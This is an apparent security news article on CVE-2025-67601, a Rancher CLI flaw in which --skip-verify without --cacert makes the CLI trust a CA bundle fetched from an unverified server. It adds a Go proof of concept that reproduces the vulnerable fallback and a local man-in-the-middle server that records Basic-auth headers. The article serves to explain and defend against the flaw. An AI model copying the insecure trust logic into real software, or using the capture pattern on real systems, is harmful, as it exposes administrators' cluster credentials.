For DevOps teams managing Kubernetes clusters at scale, the Rancher CLI is a vital tool. But a new high-severity vulnerability warning from the SUSE Rancher Security team suggests that under specific conditions, the tool might be whispering credentials to attackers when administrators think they are shouting them into a secure void.
The vulnerability, tracked as CVE-2025-67601, carries a high-severity CVSS score of 8.4. It affects the CLI's login flow when Rancher Manager runs with a self-signed CA, and it undoes the protection TLS is supposed to provide in precisely the case where users believe they have handled the certificate warning correctly.
The core of the issue lies in how the Rancher CLI handles the --skip-verify flag during login. Typically used in development environments or on internal networks where Rancher runs with a self-signed certificate, the flag is meant to skip certificate verification for the initial connection. Because of a logic flaw, however, using it without also passing --cacert does more than that: the CLI silently fetches a CA bundle from the very server it has just declined to verify, and then treats that bundle as its trust anchor.
“A vulnerability has been identified within Rancher Manager, where using self-signed CA certificates and passing the --skip-verify flag to the Rancher CLI login command without also passing the --cacert flag results in the CLI attempting to fetch CA certificates stored in Rancher’s setting cacerts.” — SUSE Rancher Security Team
This fallback behavior creates the opening. The fetch happens over a connection whose server certificate was never verified, so an attacker with network-level access between the administrator's workstation and Rancher Manager can answer in Rancher's place and hand the CLI a CA of their choosing.
The consequences are severe. Once the CLI accepts the attacker's Certificate Authority (CA), the attacker's own server certificate passes the CLI's checks, the TLS session terminates at the attacker rather than at Rancher, and the attacker sees the raw traffic.
“Attackers can also see basic authentication headers in a Man-in-the-Middle due to the lack of TLS enforcement.” — SUSE Rancher Security Team
This means the login credentials—the keys to the entire container orchestration environment—could be harvested by a lurking adversary. A Basic authentication header is only base64-encoded, not encrypted, so once the TLS layer belongs to the attacker it is effectively cleartext.
The maintainers have moved quickly to address the issue. The fix removes the CLI's ability to fetch stored CA certificates during login altogether, forcing users to be explicit about their trust anchors.
Patched Versions:
- v2.13.2
- v2.12.6
- v2.11.10
- v2.10.11
For teams unable to upgrade immediately, the advisory offers a behavioral workaround: stop relying on defaults and name the trust anchor explicitly. The CA file passed this way has to be obtained out of band, not from the server being logged into, or the workaround reintroduces the same trust-on-first-contact problem.
“If you can’t upgrade to a fixed version, please make sure whenever required, for example when using self-signed certificates, to always explicitly pass CA certificates with the --cacert flag when using the login command.” — SUSE Rancher Security Team
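To make both the fallback and the workaround concrete, the following Go program is an added example written for this page; it is not code from the Rancher CLI or from the SUSE advisory. It models the pre-fix login logic and the explicit-`--cacert` flow against a constructed man-in-the-middle endpoint that reuses `httptest`'s self-signed certificate as its own "CA". The `/v3/settings/cacerts` path returning plain PEM (real Rancher wraps the setting in JSON), the placeholder `/login` path, the `rancher-ca` stand-in certificate and the function names (`loginVulnerable`, `login`, `runScenarios`) are all the example's own assumptions.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/tls"
	"crypto/x509"
	"crypto/x509/pkix"
	"encoding/pem"
	"fmt"
	"io"
	"math/big"
	"net/http"
	"net/http/httptest"
	"sync/atomic"
	"time"
)

// newMITM starts the constructed attacker endpoint that sits where the CLI expects Rancher. It presents
// httptest's self-signed certificate, serves that same certificate at the assumed /v3/settings/cacerts
// path (plain PEM here; real Rancher wraps the setting in JSON) and records the last Authorization header.
func newMITM() (srv *httptest.Server, captured *atomic.Value) {
	captured = new(atomic.Value)
	srv = httptest.NewUnstartedServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if auth := r.Header.Get("Authorization"); auth != "" {
			captured.Store(auth)
		}
		if r.URL.Path == "/v3/settings/cacerts" {
			w.Write(pem.EncodeToMemory(&pem.Block{Type: "CERTIFICATE", Bytes: srv.Certificate().Raw}))
		}
	}))
	srv.StartTLS() // srv is assigned before serving starts, so the handler's use of it is race-free
	return srv, captured
}

// client applies the trust policy the flags imply: --skip-verify disables verification, --cacert pins
// the given bundle, and neither flag means the system roots.
func client(skipVerify bool, caPEM []byte) *http.Client {
	cfg := &tls.Config{InsecureSkipVerify: skipVerify}
	if caPEM != nil {
		cfg.RootCAs = x509.NewCertPool()
		cfg.RootCAs.AppendCertsFromPEM(caPEM)
	}
	return &http.Client{Transport: &http.Transport{TLSClientConfig: cfg, DisableKeepAlives: true}, Timeout: 5 * time.Second}
}

// login posts Basic-auth credentials to a placeholder path, trusting nothing beyond what the flags supply.
func login(url string, skipVerify bool, caPEM []byte, user, pass string) error {
	req, _ := http.NewRequest(http.MethodPost, url+"/login", nil) // the URL is well-formed, so no error
	req.SetBasicAuth(user, pass)
	resp, err := client(skipVerify, caPEM).Do(req)
	if err != nil {
		return err
	}
	return resp.Body.Close()
}

// loginVulnerable reproduces the pre-fix fallback: with --skip-verify and no --cacert, fetch the CA
// bundle from a server whose certificate was never checked, then trust that bundle for the login.
func loginVulnerable(url string, skipVerify bool, caPEM []byte, user, pass string) error {
	if skipVerify && caPEM == nil {
		resp, err := client(true, nil).Get(url + "/v3/settings/cacerts")
		if err != nil {
			return err
		}
		defer resp.Body.Close()
		if caPEM, err = io.ReadAll(resp.Body); err != nil {
			return err
		}
		skipVerify = false // the attacker-supplied bundle now "verifies" the attacker's server
	}
	return login(url, skipVerify, caPEM, user, pass)
}

// legitCAPEM is a constructed stand-in for Rancher's real self-signed CA; the MITM holds no key for it.
func legitCAPEM() []byte {
	pub, priv, _ := ed25519.GenerateKey(rand.Reader)
	tmpl := &x509.Certificate{SerialNumber: big.NewInt(1), Subject: pkix.Name{CommonName: "rancher-ca"},
		NotBefore: time.Now().Add(-time.Hour), NotAfter: time.Now().Add(time.Hour),
		IsCA: true, BasicConstraintsValid: true, KeyUsage: x509.KeyUsageCertSign}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, pub, priv)
	if err != nil {
		panic(err)
	}
	return pem.EncodeToMemory(&pem.Block{Type: "CERTIFICATE", Bytes: der})
}

// runScenarios replays the advisory's two cases against one MITM: --skip-verify alone (the vulnerable
// fallback) and the workaround, --cacert with the real CA; each returns the login error and what the MITM saw.
func runScenarios() (vulnErr error, vulnSeen string, cacertErr error, cacertSeen string) {
	srv, captured := newMITM()
	defer srv.Close()
	vulnErr = loginVulnerable(srv.URL, true, nil, "admin", "hunter2")
	vulnSeen, _ = captured.Swap("").(string)
	cacertErr = login(srv.URL, false, legitCAPEM(), "admin", "hunter2")
	cacertSeen, _ = captured.Swap("").(string)
	return
}

func main() { fmt.Println(runScenarios()) }
```

In the `--skip-verify`-only flow the login completes without error and the MITM ends up holding the Basic header for `admin:hunter2`, because the only trust anchor the CLI ever used came from the attacker. In the `--cacert` flow the handshake fails with a certificate-verification error before the request is sent, so the MITM captures nothing; that is the whole value of the workaround, and it holds only if the CA file comes from somewhere the attacker cannot influence.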